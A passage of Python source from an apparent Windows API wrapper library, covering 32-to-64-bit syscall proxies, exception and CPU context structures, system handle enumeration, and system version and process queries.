@Syswow64ApiProxy(winproxy.NtQueryVirtualMemory)
def NtQueryVirtualMemory_32_to_64(ProcessHandle, BaseAddress, MemoryInformationClass, MemoryInformation=NeededParameter, MemoryInformationLength=0, ReturnLength=None):
if ReturnLength is None:
ReturnLength = byref(ULONG())
if MemoryInformation is not None and MemoryInformationLength == 0:
MemoryInformationLength = ctypes.sizeof(MemoryInformation)
if isinstance(MemoryInformation, ctypes.Structure):
MemoryInformation = byref(MemoryInformation)
return NtQueryVirtualMemory_32_to_64.ctypes_function(ProcessHandle, BaseAddress, MemoryInformationClass, MemoryInformation, MemoryInformationLength, ReturnLength)
@Syswow64ApiProxy(winproxy.NtProtectVirtualMemory)
def NtProtectVirtualMemory_32_to_64(ProcessHandle, BaseAddress, NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection=None):
if OldAccessProtection is None:
XOldAccessProtection = DWORD()
OldAccessProtection = ctypes.addressof(XOldAccessProtection)
return NtProtectVirtualMemory_32_to_64.ctypes_function(ProcessHandle, BaseAddress, NumberOfBytesToProtect, NewAccessProtection, OldAccessProtection)
@Syswow64ApiProxy(winproxy.NtGetContextThread)
def NtGetContextThread_32_to_64(hThread, lpContext):
if type(lpContext) == windows.winobject.exception.ECONTEXT64:
lpContext = byref(lpContext)
return NtGetContextThread_32_to_64.ctypes_function(hThread, lpContext)
@Syswow64ApiProxy(winproxy.LdrLoadDll)
def LdrLoadDll_32_to_64(PathToFile, Flags, ModuleFileName, ModuleHandle):
return LdrLoadDll_32_to_64.ctypes_function(PathToFile, Flags, ModuleFileName, ModuleHandle)
@Syswow64ApiProxy(winproxy.NtSetContextThread)
def NtSetContextThread_32_to_64(hThread, lpContext):
return NtSetContextThread_32_to_64.ctypes_function(hThread, lpContext)
```
#### File: windows/winobject/exception.py
```python
import ctypes
import windows
from windows.generated_def.winstructs import *
import windows.generated_def.windef as windef
EXCEPTION_CONTINUE_SEARCH = (0x0)
EXCEPTION_CONTINUE_EXECUTION = (0xffffffff)
exception_type = [
"EXCEPTION_ACCESS_VIOLATION",
"EXCEPTION_DATATYPE_MISALIGNMENT",
"EXCEPTION_BREAKPOINT",
"EXCEPTION_SINGLE_STEP",
"EXCEPTION_ARRAY_BOUNDS_EXCEEDED",
"EXCEPTION_FLT_DENORMAL_OPERAND",
"EXCEPTION_FLT_DIVIDE_BY_ZERO",
"EXCEPTION_FLT_INEXACT_RESULT",
"EXCEPTION_FLT_INVALID_OPERATION",
"EXCEPTION_FLT_OVERFLOW",
"EXCEPTION_FLT_STACK_CHECK",
"EXCEPTION_FLT_UNDERFLOW",
"EXCEPTION_INT_DIVIDE_BY_ZERO",
"EXCEPTION_INT_OVERFLOW",
"EXCEPTION_PRIV_INSTRUCTION",
"EXCEPTION_IN_PAGE_ERROR",
"EXCEPTION_ILLEGAL_INSTRUCTION",
"EXCEPTION_NONCONTINUABLE_EXCEPTION",
"EXCEPTION_STACK_OVERFLOW",
"EXCEPTION_INVALID_DISPOSITION",
"EXCEPTION_GUARD_PAGE",
"EXCEPTION_INVALID_HANDLE",
"EXCEPTION_POSSIBLE_DEADLOCK",
]
# x -> x dict may seems strange but useful to get the Flags (with name) from the int
# exception_name_by_value[0x80000001] -> EXCEPTION_GUARD_PAGE(0x80000001L)
exception_name_by_value = dict([(x, x) for x in [getattr(windows.generated_def.windef, name) for name in exception_type]])
class EEXCEPTION_RECORDBase(object):
@property
def ExceptionCode(self):
"""The Exception code
:type: :class:`int`"""
real_code = super(EEXCEPTION_RECORDBase, self).ExceptionCode
return exception_name_by_value.get(real_code, windows.generated_def.windef.Flag("UNKNOW_EXCEPTION", real_code))
@property
def ExceptionAddress(self):
"""The Exception Address
:type: :class:`int`"""
x = super(EEXCEPTION_RECORDBase, self).ExceptionAddress
if x is None:
return 0x0
return x
class EEXCEPTION_RECORD(EEXCEPTION_RECORDBase, EXCEPTION_RECORD):
"""Enhanced exception record"""
fields = [f[0] for f in EXCEPTION_RECORD._fields_]
"""The fields of the structure"""
class EEXCEPTION_RECORD32(EEXCEPTION_RECORDBase, EXCEPTION_RECORD32):
"""Enhanced exception record (32bits)"""
fields = [f[0] for f in EXCEPTION_RECORD32._fields_]
"""The fields of the structure"""
class EEXCEPTION_RECORD64(EEXCEPTION_RECORDBase, EXCEPTION_RECORD64):
"""Enhanced exception record (64bits)"""
fields = [f[0] for f in EXCEPTION_RECORD64._fields_]
"""The fields of the structure"""
class EEXCEPTION_DEBUG_INFO32(ctypes.Structure):
"""Enhanced Debug info"""
_fields_ = windows.utils.transform_ctypes_fields(EXCEPTION_DEBUG_INFO, {"ExceptionRecord": EEXCEPTION_RECORD32})
fields = [f[0] for f in _fields_]
"""The fields of the structure"""
class EEXCEPTION_DEBUG_INFO64(ctypes.Structure):
"""Enhanced Debug info"""
_fields_ = windows.utils.transform_ctypes_fields(EXCEPTION_DEBUG_INFO, {"ExceptionRecord": EEXCEPTION_RECORD64})
fields = [f[0] for f in _fields_]
"""The fields of the structure"""
class EEflags(ctypes.Structure):
"Flag view of the Eflags register"
_fields_ = [("CF", DWORD, 1),
("RES_1", DWORD, 1),
("PF", DWORD, 1),
("RES_3", DWORD, 1),
("AF", DWORD, 1),
("RES_5", DWORD, 1),
("ZF", DWORD, 1),
("SF", DWORD, 1),
("TF", DWORD, 1),
("IF", DWORD, 1),
("DF", DWORD, 1),
("OF", DWORD, 1),
("IOPL_1", DWORD, 1),
("IOPL_2", DWORD, 1),
("NT", DWORD, 1),
("RES_15", DWORD, 1),
("RF", DWORD, 1),
("VM", DWORD, 1),
("AC", DWORD, 1),
("VIF", DWORD, 1),
("VIP", DWORD, 1),
("ID", DWORD, 1),
]
fields = [f[0] for f in _fields_]
"""The fields of the structure"""
def get_raw(self):
x = DWORD.from_address(ctypes.addressof(self))
return x.value
def set_raw(self, value):
x = DWORD.from_address(ctypes.addressof(self))
x.value = value
return None
def dump(self):
res = []
for name in [x[0] for x in self._fields_]:
if name.startswith("RES_"):
continue
if getattr(self, name):
res.append(name)
return "|".join(res)
def __repr__(self):
return hex(self)
def __hex__(self):
if self.raw == 0:
return "{0}({1})".format(type(self).__name__, hex(self.raw))
return "{0}({1}:{2})".format(type(self).__name__, hex(self.raw), self.dump())
raw = property(get_raw, set_raw)
"""Raw value of the eflags
:type: :class:`int`
"""
class EDr7(ctypes.Structure):
"Flag view of the DR7 register"
_fields_ = [("L0", DWORD, 1),
("G0", DWORD, 1),
("L1", DWORD, 1),
("G1", DWORD, 1),
("L2", DWORD, 1),
("G2", DWORD, 1),
("L3", DWORD, 1),
("G3", DWORD, 1),
("LE", DWORD, 1),
("GE", DWORD, 1),
("RES_1", DWORD, 3),
("GD", DWORD, 1),
("RES_1", DWORD, 2),
("RW0", DWORD, 2),
("LEN0", DWORD, 2),
("RW1", DWORD, 2),
("LEN1", DWORD, 2),
("RW2", DWORD, 2),
("LEN2", DWORD, 2),
("RW3", DWORD, 2),
("LEN3", DWORD, 2),
]
fields = [f[0] for f in _fields_]
"""The fields of the structure"""
class ECONTEXTBase(object):
"""DAT CONTEXT"""
default_dump = ()
pc_reg = ''
sp_reg = ''
func_result_reg = ''
special_reg_type = {}
def regs(self, to_dump=None):
"""Return the name and values of the registers
:returns: [(reg_name, value)] -- A :class:`list` of :class:`tuple`"""
res = []
if to_dump is None:
to_dump = self.default_dump
for name in to_dump:
value = getattr(self, name)
if name in self.special_reg_type:
value = self.special_reg_type[name](value)
res.append((name, value))
return res
def dump(self, to_dump=None):
"""Dump (print) the current context"""
regs = self.regs()
for name, value in regs:
print("{0} -> {1}".format(name, hex(value)))
return None
def get_pc(self):
return getattr(self, self.pc_reg)
def set_pc(self, value):
return setattr(self, self.pc_reg, value)
def get_sp(self):
return getattr(self, self.sp_reg)
def set_sp(self, value):
return setattr(self, self.sp_reg, value)
def get_func_result(self):
return getattr(self, self.func_result_reg)
def set_func_result(self, value):
return setattr(self, self.func_result_reg, value)
pc = property(get_pc, set_pc, None, "Program Counter register (EIP or RIP)")
sp = property(get_sp, set_sp, None, "Stack Pointer register (ESP or RSP)")
func_result = property(get_func_result, set_func_result, None, "Function Resultat register (EAX or RAX)")
@property
def EEFlags(self):
"""Enhanced view of the Eflags (you also have ``EFlags`` for the raw value)
:type: :class:`EEflags`
"""
off = type(self).EFlags.offset
x = EEflags.from_address(ctypes.addressof(self) + off)
x.self = self
return x
@property
def EDr7(self):
"""Enhanced view of the DR7 register (you also have ``Dr7`` for the raw value)
:type: :class:`EDr7`
"""
off = type(self).Dr7.offset
x = EDr7.from_address(ctypes.addressof(self) + off)
x.self = self
return x
class ECONTEXT32(ECONTEXTBase, CONTEXT32):
default_dump = ('Eip', 'Esp', 'Eax', 'Ebx', 'Ecx', 'Edx', 'Ebp', 'Edi', 'Esi', 'EFlags')
pc_reg = 'Eip'
sp_reg = 'Esp'
func_result_reg = 'Eax'
fields = [f[0] for f in CONTEXT32._fields_]
"""The fields of the structure"""
class ECONTEXTWOW64(ECONTEXTBase, WOW64_CONTEXT):
default_dump = ('Eip', 'Esp', 'Eax', 'Ebx', 'Ecx', 'Edx', 'Ebp', 'Edi', 'Esi', 'EFlags')
pc_reg = 'Eip'
sp_reg = 'Esp'
func_result_reg = 'Eax'
fields = [f[0] for f in WOW64_CONTEXT._fields_]
"""The fields of the structure"""
class ECONTEXT64(ECONTEXTBase, CONTEXT64):
default_dump = ('Rip', 'Rsp', 'Rax', 'Rbx', 'Rcx', 'Rdx', 'Rbp', 'Rdi', 'Rsi',
'R8', 'R9', 'R10', 'R11', 'R12', 'R13', 'R14', 'R15', 'EFlags')
pc_reg = 'Rip'
sp_reg = 'Rsp'
func_result_reg = 'Rax'
fields = [f[0] for f in CONTEXT64._fields_]
"""The fields of the structure"""
@classmethod
def new_aligned(cls):
"""Return a new :class:`ECONTEXT64` aligned on 16 bits
temporary workaround or horrible hack ? choose your side
"""
size = ctypes.sizeof(cls)
nb_qword = (size + 8) / ctypes.sizeof(ULONGLONG)
buffer = (nb_qword * ULONGLONG)()
struct_address = ctypes.addressof(buffer)
if (struct_address & 0xf) not in [0, 8]:
raise ValueError("ULONGLONG array not aligned on 8")
if (struct_address & 0xf) == 8:
struct_address += 8
self = cls.from_address(struct_address)
# Keep the raw buffer alive
self._buffer = buffer
return self
def bitness():
"""Return 32 or 64"""
import platform
bits = platform.architecture()[0]
return int(bits[:2])
if bitness() == 32:
ECONTEXT = ECONTEXT32
else:
ECONTEXT = ECONTEXT64
class EEXCEPTION_POINTERS(ctypes.Structure):
_fields_ = [
("ExceptionRecord", ctypes.POINTER(EEXCEPTION_RECORD)),
("ContextRecord", ctypes.POINTER(ECONTEXT)),
]
def dump(self):
"""Dump (print) the EEXCEPTION_POINTERS"""
record = self.ExceptionRecord[0]
print("Dumping Exception: ")
print(" ExceptionCode = {0} at {1}".format(record.ExceptionCode, hex(record.ExceptionAddress)))
regs = self.ContextRecord[0].regs()
for name, value in regs:
print(" {0} -> {1}".format(name, hex(value)))
class VectoredException(object):
"""A decorator that create a callable which can be passed to :func:`AddVectoredExceptionHandler`"""
func_type = ctypes.WINFUNCTYPE(ctypes.c_uint, ctypes.POINTER(EEXCEPTION_POINTERS))
def __new__(cls, func):
self = object.__new__(cls)
self.func = func
v = self.func_type(self.decorator)
v.self = self
return v
def decorator(self, exception_pointers):
try:
return self.func(exception_pointers)
except BaseException as e:
import traceback
print("Ignored Python Exception in Vectored Exception: {0}".format(e))
traceback.print_exc()
return windef.EXCEPTION_CONTINUE_SEARCH
class VectoredExceptionHandler(object):
def __init__(self, pos, handler):
self.handler = VectoredException(handler)
self.pos = pos
def __enter__(self):
self.value = windows.winproxy.AddVectoredExceptionHandler(self.pos, self.handler)
return self
def __exit__(self, exc_type, exc_value, traceback):
windows.winproxy.RemoveVectoredExceptionHandler(self.value)
return False
class DumpContextOnException(VectoredExceptionHandler):
def __init__(self, exit=False):
self.exit = exit
super(DumpContextOnException, self).__init__(self.print_context_result)
def print_context_result(self, exception_pointers):
except_record = exception_pointers[0].ExceptionRecord[0]
exception_pointers[0].dump()
sys.stdout.flush()
if self.exit:
windows.current_process.exit()
return 0
```
#### File: windows/winobject/handle.py
```python
import os
import ctypes
import windows
from windows import winproxy
from windows.generated_def import windef
from windows.generated_def.winstructs import *
# Remove this ?
class EPUBLIC_OBJECT_TYPE_INFORMATION(PUBLIC_OBJECT_TYPE_INFORMATION):
pass
current_process_pid = os.getpid()
class Handle(SYSTEM_HANDLE):
"""A handle of the system"""
@windows.utils.fixedpropety
def process(self):
"""The process possessing the handle
:type: :class:`WinProcess <windows.winobject.process.WinProcess>`"""
# "TODO: something smart ? :D"
# return [p for p in windows.system.processes if p.pid == self.dwProcessId][0]
return windows.WinProcess(pid=self.dwProcessId)
@windows.utils.fixedpropety
def name(self):
"""The name of the handle
:type: :class:`str`"""
return self._get_object_name()
@windows.utils.fixedpropety
def type(self):
"""The type of the handle
:type: :class:`str`"""
return self._get_object_type()
@property
def infos(self):
"""TODO: DOC"""
return self._get_object_basic_infos()
def _get_object_name(self):
lh = self.local_handle
size_needed = DWORD()
yyy = ctypes.c_buffer(0x1000)
winproxy.NtQueryObject(lh, ObjectNameInformation, ctypes.byref(yyy), ctypes.sizeof(yyy), ctypes.byref(size_needed))
return LSA_UNICODE_STRING.from_buffer_copy(yyy[:size_needed.value]).str
def _get_object_type(self):
lh = self.local_handle
xxx = EPUBLIC_OBJECT_TYPE_INFORMATION()
size_needed = DWORD()
try:
winproxy.NtQueryObject(lh, ObjectTypeInformation, ctypes.byref(xxx), ctypes.sizeof(xxx), ctypes.byref(size_needed))
except WindowsError as e:
if e.code != STATUS_INFO_LENGTH_MISMATCH:
# print("ERROR WITH {0:x}".format(lh))
raise
size = size_needed.value
buffer = ctypes.c_buffer(size)
winproxy.NtQueryObject(lh, ObjectTypeInformation, buffer, size, ctypes.byref(size_needed))
xxx = EPUBLIC_OBJECT_TYPE_INFORMATION.from_buffer_copy(buffer)
return xxx.TypeName.str
def _get_object_basic_infos(self):
pass
lh = self.local_handle
size_needed = DWORD()
basic_infos = PUBLIC_OBJECT_BASIC_INFORMATION()
winproxy.NtQueryObject(lh, ObjectBasicInformation, ctypes.byref(basic_infos), ctypes.sizeof(basic_infos), ctypes.byref(size_needed))
return basic_infos
#PUBLIC_OBJECT_BASIC_INFORMATION
@windows.utils.fixedpropety
def local_handle(self):
"""A local copy of the handle, acquired with ``DuplicateHandle``
:type: :class:`int`"""
if self.dwProcessId == windows.current_process.pid:
return self.wValue
res = HANDLE()
winproxy.DuplicateHandle(self.process.handle, self.wValue, windows.current_process.handle, ctypes.byref(res), dwOptions=DUPLICATE_SAME_ACCESS)
return res.value
def description(self):
stype = self.type
descr_func = getattr(self, "description_" + stype, None)
if descr_func is None:
return None
return descr_func()
def description_Process(self):
proc = windows.WinProcess(handle=self.wValue)
res = str(proc)
del proc._handle
return res
def description_Thread(self):
thread = windows.WinThread(handle=self.wValue)
res = str(thread)
del thread._handle
return res
def __repr__(self):
return "<{0} value=<0x{1:x}> in process pid={2}>".format(type(self).__name__, self.wValue, self.dwProcessId)
def __del__(self):
if self.dwProcessId == current_process_pid:
return
if hasattr(self, "_local_handle"):
return winproxy.CloseHandle(self._local_handle)
def enumerate_handles():
size_needed = ULONG()
size = 0x1000
buffer = ctypes.c_buffer(size)
try:
winproxy.NtQuerySystemInformation(16, buffer, size, ReturnLength=ctypes.byref(size_needed))
except WindowsError as e:
pass
size = size_needed.value + 0x1000
buffer = ctypes.c_buffer(size)
winproxy.NtQuerySystemInformation(16, buffer, size, ReturnLength=ctypes.byref(size_needed))
x = SYSTEM_HANDLE_INFORMATION.from_buffer(buffer)
class _GENERATED_SYSTEM_HANDLE_INFORMATION(ctypes.Structure):
_fields_ = [
("HandleCount", ULONG),
("Handles", Handle * x.HandleCount),
]
return list(_GENERATED_SYSTEM_HANDLE_INFORMATION.from_buffer_copy(buffer[:size_needed.value]).Handles)
```
#### File: windows/winobject/system.py
```python
import os
import ctypes
import copy
import struct
import windows
from windows import winproxy
from windows import utils
import windows.generated_def as gdef
from windows.winobject import process
from windows.winobject import network
from windows.winobject import registry
from windows.winobject import exception
from windows.winobject import service
from windows.winobject import volume
from windows.winobject import wmi
from windows.winobject import object_manager
from windows.winobject import handle
from windows.winobject import event_log
from windows.winobject import task_scheduler
from windows.winobject import system_module
from windows.generated_def.winstructs import *
from windows.dbgprint import dbgprint
class System(object):
"""The state of the current ``Windows`` system ``Python`` is running on"""
# Setup these in a fixedproperty ?
network = network.Network()
"""Object of class :class:`windows.winobject.network.Network`"""
registry = registry.Registry()
"""Object of class :class:`windows.winobject.registry.Registry`"""
@property
def processes(self):
"""The list of running processes
:type: [:class:`~windows.winobject.process.WinProcess`] -- A list of Process
"""
return self.enumerate_processes()
@property
def threads(self):
"""The list of running threads
:type: [:class:`~windows.winobject.process.WinThread`] -- A list of Thread
"""
return self.enumerate_threads_setup_owners()
@property
def logicaldrives(self):
"""List of logical drives [C:\, ...]
:type: [:class:`~windows.winobject.volume.LogicalDrive`] -- A list of LogicalDrive
"""
return volume.enum_logical_drive()
@property
def services(self):
"""The list of services
:type: [:class:`~windows.winobject.service.ServiceA`] -- A list of Service"""
return service.enumerate_services()
@property
def handles(self):
"""The list of system handles
:type: [:class:`~windows.winobject.handle.Handle`] -- A list of Hanlde"""
return handle.enumerate_handles()
@property
def modules(self):
"""The list of system modules
:type: [:class:`~windows.winobject.system_module.SystemModule`] -- A list of :class:`~windows.winobject.system_module.SystemModule` or :class:`~windows.winobject.system_module.SystemModuleWow64`
"""
return system_module.enumerate_kernel_modules()
@utils.fixedpropety
def bitness(self):
"""The bitness of the system
:type: :class:`int` -- 32 or 64
"""
if os.environ["PROCESSOR_ARCHITECTURE"].lower() != "x86":
return 64
if "PROCESSOR_ARCHITEW6432" in os.environ:
return 64
return 32
@utils.fixedpropety
def wmi(self):
r"""An object to perform wmi requests to various namespaces
:type: :class:`~windows.winobject.wmi.WmiManager`"""
return wmi.WmiManager()
@utils.fixedpropety
def event_log(self):
return event_log.EvtlogManager()
@utils.fixedpropety
def task_scheduler(self):
"""An object able to manage scheduled tasks on the local system
:type: :class:`~windows.winobject.task_scheduler.TaskService`
"""
windows.com.init()
clsid_task_scheduler = gdef.IID.from_string("0f87369f-a4e5-4cfc-bd3e-73e6154572dd")
task_service = task_scheduler.TaskService()
# What is non-implemented (WinXP)
# Raise (NotImplementedError?) ? Return NotImplemented ?
windows.com.create_instance(clsid_task_scheduler, task_service)
task_service.connect()
return task_service
@utils.fixedpropety
def object_manager(self):
"""An object to query the objects in the kernel object manager.
:type: :class:`~windows.winobject.object_manager.ObjectManager`
"""
return windows.winobject.object_manager.ObjectManager()
#TODO: use GetComputerNameExA ? and recover other names ?
@utils.fixedpropety
def computer_name(self):
"""The name of the computer
:type: :class:`str`
"""
size = DWORD(0x1000)
buf = ctypes.c_buffer(size.value)
winproxy.GetComputerNameA(buf, ctypes.byref(size))
return buf[:size.value]
@utils.fixedpropety
def version(self):
"""The version of the system
:type: (:class:`int`, :class:`int`) -- (Major, Minor)
"""
data = self.get_version()
result = data.dwMajorVersion, data.dwMinorVersion
if result == (6,2):
result_str = self.get_file_version("kernel32")
result_tup = [int(x) for x in result_str.split(".")]
result = tuple(result_tup[:2])
return result
@utils.fixedpropety
def version_name(self):
"""The name of the system version, values are:
* Windows Server 2016
* Windows 10
* Windows Server 2012 R2
* Windows 8.1
* Windows Server 2012
* Windows 8
* Windows Server 2008
* Windows 7
* Windows Server 2008
* Windows Vista
* Windows XP Professional x64 Edition
* TODO: version (5.2) + is_workstation + bitness == 32 (don't even know if possible..)
* Windows Server 2003 R2
* Windows Server 2003
* Windows XP
* Windows 2000
* "Unknow Windows <version={0} | is_workstation={1}>".format(version, is_workstation)
:type: :class:`str`
"""
version = self.version
is_workstation = self.product_type == VER_NT_WORKSTATION
if version == (10, 0):
return ["Windows Server 2016", "Windows 10"][is_workstation]
elif version == (6, 3):
return ["Windows Server 2012 R2", "Windows 8.1"][is_workstation]
elif version == (6, 2):
return ["Windows Server 2012", "Windows 8"][is_workstation]
elif version == (6, 1):
return ["Windows Server 2008 R2", "Windows 7"][is_workstation]
elif version == (6, 0):
return ["Windows Server 2008", "Windows Vista"][is_workstation]
elif version == (5, 2):
metric = winproxy.GetSystemMetrics(SM_SERVERR2)
if is_workstation:
if self.bitness == 64:
return "Windows XP Professional x64 Edition"
else:
return "TODO: version (5.2) + is_workstation + bitness == 32"
elif metric != 0:
return "Windows Server 2003 R2"
else:
return "Windows Server 2003"
elif version == (5, 1):
return "Windows XP"
elif version == (5, 0):
return "Windows 2000"
else:
return "Unknow Windows <version={0} | is_workstation={1}>".format(version, is_workstation)
VERSION_MAPPER = gdef.FlagMapper(VER_NT_WORKSTATION, VER_NT_DOMAIN_CONTROLLER, VER_NT_SERVER)
@utils.fixedpropety
def product_type(self):
"""The product type, value might be:
* VER_NT_WORKSTATION(0x1L)
* VER_NT_DOMAIN_CONTROLLER(0x2L)
* VER_NT_SERVER(0x3L)
:type: :class:`long` or :class:`int` (or subclass)
"""
version = self.get_version()
return self.VERSION_MAPPER[version.wProductType]
EDITION_MAPPER = gdef.FlagMapper(PRODUCT_UNDEFINED,
PRODUCT_ULTIMATE,
PRODUCT_HOME_BASIC,
PRODUCT_HOME_PREMIUM,
PRODUCT_ENTERPRISE,
PRODUCT_HOME_BASIC_N,
PRODUCT_BUSINESS,
PRODUCT_STANDARD_SERVER,
PRODUCT_DATACENTER_SERVER,
PRODUCT_SMALLBUSINESS_SERVER,
PRODUCT_ENTERPRISE_SERVER,
PRODUCT_STARTER,
PRODUCT_DATACENTER_SERVER_CORE,
PRODUCT_STANDARD_SERVER_CORE,
PRODUCT_ENTERPRISE_SERVER_CORE,
PRODUCT_ENTERPRISE_SERVER_IA64,
PRODUCT_BUSINESS_N,
PRODUCT_WEB_SERVER,
PRODUCT_CLUSTER_SERVER,
PRODUCT_HOME_SERVER,
PRODUCT_STORAGE_EXPRESS_SERVER,
PRODUCT_STORAGE_STANDARD_SERVER,
PRODUCT_STORAGE_WORKGROUP_SERVER,
PRODUCT_STORAGE_ENTERPRISE_SERVER,
PRODUCT_SERVER_FOR_SMALLBUSINESS,
PRODUCT_SMALLBUSINESS_SERVER_PREMIUM,
PRODUCT_HOME_PREMIUM_N,
PRODUCT_ENTERPRISE_N,
PRODUCT_ULTIMATE_N,
PRODUCT_WEB_SERVER_CORE,
PRODUCT_MEDIUMBUSINESS_SERVER_MANAGEMENT,
PRODUCT_MEDIUMBUSINESS_SERVER_SECURITY,
PRODUCT_MEDIUMBUSINESS_SERVER_MESSAGING,
PRODUCT_SERVER_FOUNDATION,
PRODUCT_HOME_PREMIUM_SERVER,
PRODUCT_SERVER_FOR_SMALLBUSINESS_V,
PRODUCT_STANDARD_SERVER_V,
PRODUCT_DATACENTER_SERVER_V,
PRODUCT_ENTERPRISE_SERVER_V,
PRODUCT_DATACENTER_SERVER_CORE_V,
PRODUCT_STANDARD_SERVER_CORE_V,
PRODUCT_ENTERPRISE_SERVER_CORE_V,
PRODUCT_HYPERV,
PRODUCT_STORAGE_EXPRESS_SERVER_CORE,
PRODUCT_STORAGE_STANDARD_SERVER_CORE,
PRODUCT_STORAGE_WORKGROUP_SERVER_CORE,
PRODUCT_STORAGE_ENTERPRISE_SERVER_CORE,
PRODUCT_STARTER_N,
PRODUCT_PROFESSIONAL,
PRODUCT_PROFESSIONAL_N,
PRODUCT_SB_SOLUTION_SERVER,
PRODUCT_SERVER_FOR_SB_SOLUTIONS,
PRODUCT_STANDARD_SERVER_SOLUTIONS,
PRODUCT_STANDARD_SERVER_SOLUTIONS_CORE,
PRODUCT_SB_SOLUTION_SERVER_EM,
PRODUCT_SERVER_FOR_SB_SOLUTIONS_EM,
PRODUCT_SOLUTION_EMBEDDEDSERVER,
PRODUCT_SOLUTION_EMBEDDEDSERVER_CORE,
PRODUCT_SMALLBUSINESS_SERVER_PREMIUM_CORE,
PRODUCT_ESSENTIALBUSINESS_SERVER_MGMT,
PRODUCT_ESSENTIALBUSINESS_SERVER_ADDL,
PRODUCT_ESSENTIALBUSINESS_SERVER_MGMTSVC,
PRODUCT_ESSENTIALBUSINESS_SERVER_ADDLSVC,
PRODUCT_CLUSTER_SERVER_V,
PRODUCT_EMBEDDED,
PRODUCT_STARTER_E,
PRODUCT_HOME_BASIC_E,
PRODUCT_HOME_PREMIUM_E,
PRODUCT_PROFESSIONAL_E,
PRODUCT_ENTERPRISE_E,
PRODUCT_ULTIMATE_E,
PRODUCT_ENTERPRISE_EVALUATION,
PRODUCT_MULTIPOINT_STANDARD_SERVER,
PRODUCT_MULTIPOINT_PREMIUM_SERVER,
PRODUCT_STANDARD_EVALUATION_SERVER,
PRODUCT_DATACENTER_EVALUATION_SERVER,
PRODUCT_ENTERPRISE_N_EVALUATION,
PRODUCT_STORAGE_WORKGROUP_EVALUATION_SERVER,
PRODUCT_STORAGE_STANDARD_EVALUATION_SERVER,
PRODUCT_CORE_ARM,
PRODUCT_CORE_N,
PRODUCT_CORE_COUNTRYSPECIFIC,
PRODUCT_CORE_LANGUAGESPECIFIC,
PRODUCT_CORE,
PRODUCT_PROFESSIONAL_WMC,
PRODUCT_UNLICENSED)
@utils.fixedpropety
def edition(self): # Find a better name ?
version = self.get_version()
edition = DWORD()
try:
winproxy.GetProductInfo(version.dwMajorVersion,
version.dwMinorVersion,
version.wServicePackMajor,
version.wServicePackMinor,
edition)
except winproxy.ExportNotFound as e:
# Windows XP does not implem GetProductInfo
assert version.dwMajorVersion, version.dwMinorVersion == (5,1)
return self._edition_windows_xp()
return self.EDITION_MAPPER[edition.value]
def _edition_windows_xp(self):
# Emulate standard response from IsOS(gdef.OS_PROFESSIONAL)
if winproxy.IsOS(gdef.OS_PROFESSIONAL):
return PRODUCT_PROFESSIONAL
return PRODUCT_HOME_BASIC
@utils.fixedpropety
def windir(self):
buffer = ctypes.c_buffer(0x100)
reslen = winproxy.GetWindowsDirectoryA(buffer)
return buffer[:reslen]
def get_version(self):
data = windows.generated_def.OSVERSIONINFOEXA()
data.dwOSVersionInfoSize = ctypes.sizeof(data)
winproxy.GetVersionExA(ctypes.cast(ctypes.pointer(data), ctypes.POINTER(windows.generated_def.OSVERSIONINFOA)))
return data
def get_file_version(self, name):
size = winproxy.GetFileVersionInfoSizeA(name)
buf = ctypes.c_buffer(size)
winproxy.GetFileVersionInfoA(name, 0, size, buf)
bufptr = PVOID()
bufsize = UINT()
winproxy.VerQueryValueA(buf, "\\VarFileInfo\\Translation", ctypes.byref(bufptr), ctypes.byref(bufsize))
bufstr = ctypes.cast(bufptr, LPCSTR)
tup = struct.unpack("<HH", bufstr.value[:4])
req = "{0:04x}{1:04x}".format(*tup)
winproxy.VerQueryValueA(buf, "\\StringFileInfo\\{0}\\ProductVersion".format(req), ctypes.byref(bufptr), ctypes.byref(bufsize))
bufstr = ctypes.cast(bufptr, LPCSTR)
return bufstr.value
@utils.fixedpropety
def build_number(self):
# This returns the last version where ntdll was updated
# Should look at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
# values: CurrentBuild + UBR
# windows.system.registry(r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion")["CurrentBuild"].value
# windows.system.registry(r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion")["UBR"].value
return self.get_file_version("comctl32")
@staticmethod
def enumerate_processes():
dbgprint("Enumerating processes with CreateToolhelp32Snapshot", "SLOW")
process_entry = PROCESSENTRY32()
process_entry.dwSize = ctypes.sizeof(process_entry)
snap = winproxy.CreateToolhelp32Snapshot(gdef.TH32CS_SNAPPROCESS, 0)
winproxy.Process32First(snap, process_entry)
res = []
res.append(process.WinProcess._from_PROCESSENTRY32(process_entry))
while winproxy.Process32Next(snap, process_entry):
res.append(process.WinProcess._from_PROCESSENTRY32(process_entry))
winproxy.CloseHandle(snap)
return res
@staticmethod
def enumerate_threads_generator():
# Ptet dangereux, parce que on yield la meme THREADENTRY32 a chaque fois
dbgprint("Enumerating threads with CreateToolhelp32Snapshot <generator>", "SLOW")
thread_entry = THREADENTRY32()
thread_entry.dwSize = ctypes.sizeof(thread_entry)
snap = winproxy.CreateToolhelp32Snapshot(gdef.TH32CS_SNAPTHREAD, 0)
dbgprint("New handle CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD) <generator> | {0:#x}".format(snap), "HANDLE")
try:
winproxy.Thread32First(snap, thread_entry)
yield thread_entry
while winproxy.Thread32Next(snap, thread_entry):
yield thread_entry
finally:
winproxy.CloseHandle(snap)
dbgprint("CLOSE CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD) <generator> | {0:#x}".format(snap), "HANDLE")
@staticmethod
def enumerate_threads():
return [WinThread._from_THREADENTRY32(th) for th in System.enumerate_threads_generator()]
def enumerate_threads_setup_owners(self):
# Enumerating threads is a special operation concerning the owner process.
# We may not be able to retrieve the name of the owning process by normal way
# (as we need to get a handle on the process)
# So, this implementation of enumerate_thread also setup the owner with the result of enumerate_processes
dbgprint("Enumerating threads with CreateToolhelp32Snapshot and setup owner", "SLOW")
# One snap for both enum to be prevent race
snap = winproxy.CreateToolhelp32Snapshot(gdef.TH32CS_SNAPTHREAD | gdef.TH32CS_SNAPPROCESS, 0)
process_entry = PROCESSENTRY32()
process_entry.dwSize = ctypes.sizeof(process_entry)
winproxy.Process32First(snap, process_entry)
processes = []
processes.append(process.WinProcess._from_PROCESSENTRY32(process_entry))
while winproxy.Process32Next(snap, process_entry):
processes.append(process.WinProcess._from_PROCESSENTRY32(process_entry))
# Forge a dict pid -> process
proc_dict = {proc.pid: proc for proc in processes}
